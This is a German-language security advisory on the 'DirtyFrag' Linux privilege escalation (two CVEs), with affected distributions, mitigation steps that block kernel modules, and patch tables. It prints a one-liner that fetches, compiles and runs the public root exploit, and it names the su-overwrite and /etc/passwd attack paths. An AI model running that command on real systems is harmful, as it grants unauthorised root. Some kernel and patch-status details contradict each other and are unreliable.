DirtyFrag — Universelle Linux LPE

Zwei verkettete Kernel-Bugs ermöglichen deterministische Privilege Escalation auf allen gängigen Linux-Distributionen

8. Mai 2026 · Aktualisiert: 13. Mai 2026 · CVE-2026-43284 / CVE-2026-43500 · Sicherheit · Linux · Kernel

Kritisch — Patches teils verfügbar

DirtyFrag ermöglicht einem lokalen Angreifer ohne Root-Rechte vollständige Root-Privilegien. Offiziell als CVE-2026-43284 (ESP/xfrm, CVSS 8.8) und CVE-2026-43500 (RxRPC, CVSS 7.8) vergeben. Debian und RHEL/AlmaLinux haben Patches für CVE-2026-43284 veröffentlicht. CVE-2026-43500 ist bei den meisten Distros noch ausstehend.

Update — 13. Mai 2026

DirtyFrag hat offizielle CVE-Nummern erhalten: CVE-2026-43284 (xfrm/ESP, CVSS 8.8) und CVE-2026-43500 (RxRPC, CVSS 7.8). Debian (Bookworm 6.1.170-3 und Trixie 6.12.86-1) sowie RHEL 8/9/10 haben Kernel-Patches für CVE-2026-43284 veröffentlicht. CVE-2026-43500 ist bei den meisten Distributionen noch ungepatcht. Patch-Status-Tabelle und Distro-Blöcke aktualisiert.

Am 7. Mai 2026 wurde auf der oss-security-Mailingliste eine neue Linux-Schwachstelle offengelegt: DirtyFrag. Der Name beschreibt das Prinzip — fragmentierte, schmutzige Page-Cache-Schreibzugriffe. Die Besonderheit: Anders als viele Kernel-Exploits ist DirtyFrag deterministisch, hängt von keinem Timing-Fenster ab und erzeugt keine Kernel Panics.

Getestet wurde erfolgreich auf Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10 und Fedora 44.

Was steckt dahinter?

DirtyFrag verkettet zwei unabhängige Kernel-Bugs im Page Cache, die beide einen kontrollierten Schreibzugriff auf beliebige Dateien ermöglichen:

Bug 1 — xfrm-ESP Page-Cache Write (seit 2017)

Der Commit cac2661c53f3 (2017) führte eine Schwachstelle im IPsec-Subsystem (xfrm) ein. Das ESP4/ESP6-Modul schreibt beim Verarbeiten von Netzwerkpaketen unkontrolliert in den Page Cache. Dieser Pfad erfordert Namespace-Erstellungs-Rechte (in den meisten Distros per Default unprivilegiert möglich).

Bug 2 — RxRPC Page-Cache Write (seit 2023)

Der Commit 2dc334f1a63a (Juni 2023) brachte eine ähnliche Lücke im RxRPC/RxKAD-Protokoll-Modul. Dieser Pfad ist noch breiter angreifbar — er benötigt keine Namespace-Privilegien.

Technischer Kern

Beide Bugs ermöglichen einen arbiträren 4-Byte-Schreibzugriff in den Linux Page Cache — auf Dateien, die der Angreifer lesen kann. Das reicht für zwei Angriffspfade: Überschreiben von /usr/bin/su mit Shellcode, oder Eintragen eines Root-Users ohne Passwort in /etc/passwd.

Exploit-Kette

seit 2017

xfrm-ESP Bug

4-Byte Page-Cache-Write via IPsec/ESP
Benötigt: Namespace-Rechte

seit 2023

RxRPC Bug

4-Byte Page-Cache-Write via RxRPC
Benötigt: keine Sonderrechte

→

Ergebnis

Root

Deterministisch, ohne Timing-Fenster, keine Kernel Panic

Der PoC kompiliert in einer Zeile:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Hinweis

Der PoC-Code ist öffentlich verfügbar. Das bedeutet: Jeder lokale Benutzer auf einem ungepatchten System — z. B. in einem Shared-Hosting-Szenario, auf einem CI-Runner oder nach einer initialen Kompromittierung — kann Root erlangen.

Bin ich betroffen?

Alle Systeme mit Linux-Kernel ≥ 4.14 (xfrm-ESP, 2017) bzw. ≥ 6.4 (RxRPC, 2023) sind potenziell betroffen. Das deckt praktisch jede produktive Linux-Installation ab.

Distribution	Kernel	ESP-Pfad	RxRPC-Pfad	Status
Ubuntu 24.04 LTS	`6.8.x`	✓	✓	Betroffen
Debian 12 (Bookworm)	`6.1.x`	✓	–	Gepatcht (6.1.170-3)
Debian 13 (Trixie / Proxmox)	`6.17.x`	✓	✓	Gepatcht (6.12.86-1)
RHEL 10.1 / AlmaLinux 10	`6.12.x`	✓	✓	ESP ✓ · RxRPC ausstehend
openSUSE Tumbleweed	Rolling	✓	✓	Betroffen
Fedora 44	`6.14.x`	✓	✓	Betroffen

Schnellcheck — welche Module sind geladen:

lsmod | grep -E 'esp4|esp6|rxrpc'

Keine Ausgabe = Module aktuell nicht geladen, aber jederzeit on-demand ladbar. Der Sofortfix unten verhindert genau das.

Sofortfix (alle Distros)

Solange kein gepatchter Kernel verfügbar ist, die drei verwundbaren Module dauerhaft blockieren:

# Module dauerhaft sperren
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
  > /etc/modprobe.d/dirtyfrag.conf

# Falls bereits geladen: entladen
rmmod esp4 esp6 rxrpc 2>/dev/null; true

# Verifizieren — alle drei müssen scheitern
modprobe esp4; modprobe esp6; modprobe rxrpc

WireGuard-Kompatibilität

WireGuard ist nicht betroffen. Die gesperrten Module (esp4, esp6, rxrpc) gehören zum IPsec/xfrm-Subsystem und zum AFS-Protokoll — WireGuard nutzt weder das eine noch das andere. WireGuard-Dependencies: udp_tunnel, ip6_udp_tunnel, libchacha20poly1305, curve25519.

Einschränkung

Wer aktiv IPsec/IKEv2-VPN-Verbindungen nutzt (z. B. strongSwan, Libreswan), wird durch das Sperren von esp4/esp6 beeinträchtigt. WireGuard, OpenVPN und andere VPN-Lösungen sind nicht betroffen.

Distro-spezifische Anleitung

🟠 Ubuntu 22.04 / 24.04 LTS Betroffen

Kernel: 5.15.x / 6.8.x

# Sofortfix
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
  | sudo tee /etc/modprobe.d/dirtyfrag.conf
sudo rmmod esp4 esp6 rxrpc 2>/dev/null; true

# Sobald Patch erscheint — Mitigation rückgängig machen:
sudo rm /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt upgrade -y linux-image-generic
sudo reboot

🔴 Debian 12 (Bookworm) / 13 (Trixie) Gepatcht

Bookworm: 6.1.170-3 · Trixie: 6.12.86-1 · beide CVEs gepatcht

sudo rm -f /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt dist-upgrade -y
sudo reboot

🟣 Proxmox VE (Debian Trixie Basis) Gepatcht

Kernel: 6.17.x-pve · gepatcht über Debian Trixie Security

sudo rm -f /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt dist-upgrade -y
sudo reboot

🔵 RHEL 8 / 9 / 10 · AlmaLinux · Rocky Linux ESP gepatcht · RxRPC ausstehend

RHEL 8: 4.18.0-553.124.1 · RHEL 9: 5.14.0-611.55.1 · RHEL 10: 6.12.0-124.56.1

# CVE-2026-43284 (ESP/xfrm): Patch verfügbar
sudo dnf update kernel && sudo reboot

# Mitigation für esp4/esp6 danach entfernen:
sudo rm -f /etc/modprobe.d/dirtyfrag.conf

# CVE-2026-43500 (RxRPC): rxrpc-Sperre bleibt bis Patch erscheint
# Status: https://access.redhat.com/security/cve/CVE-2026-43500

Patch-Status

Stand: 13. Mai 2026

Distribution	CVE-2026-43284 (ESP/xfrm)	CVE-2026-43500 (RxRPC)
Debian 12 (Bookworm)	6.1.170-3	6.1.170-3
Debian 13 (Trixie)	6.12.86-1	6.12.86-1
Proxmox VE	über Debian Trixie	über Debian Trixie
RHEL 8	4.18.0-553.124.1	Ausstehend
RHEL 9	5.14.0-611.55.1	Ausstehend
RHEL 10 / AlmaLinux / Rocky	6.12.0-124.56.1	Ausstehend
Ubuntu 24.04 / 22.04	Ausstehend	Ausstehend
Fedora / openSUSE	Ausstehend	Ausstehend
Arch Linux	Ausstehend	Ausstehend
Mainline	7.1-rc3+	7.1-rc3+

Hintergrund — CVEs nachträglich vergeben

DirtyFrag wurde im Rahmen eines koordinierten Embargos gemeldet, das vor Fertigstellung der Patches gebrochen wurde. Die CVE-Nummern wurden nachträglich vergeben: CVE-2026-43284 (reserviert 01.05.2026, veröffentlicht 08.05.2026) für den xfrm/ESP-Bug und CVE-2026-43500 (veröffentlicht 11.05.2026) für den RxRPC-Bug.